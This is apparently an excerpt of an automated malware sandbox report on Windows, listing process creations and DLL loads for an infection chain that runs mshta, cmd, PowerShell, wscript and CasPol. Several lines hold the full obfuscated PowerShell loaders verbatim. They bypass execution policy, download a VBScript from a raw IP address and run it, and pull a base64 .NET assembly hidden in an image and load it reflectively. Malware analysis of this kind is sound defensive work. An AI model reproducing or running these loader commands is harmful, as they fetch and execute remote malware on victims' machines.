                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eykjjr5p\eykjjr5p.cmdline"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB0F9.tmp" "c:\Users\user\AppData\Local\Temp\eykjjr5p\CSC29E03D134814371801318532EC93FB.TMP"Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeingJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
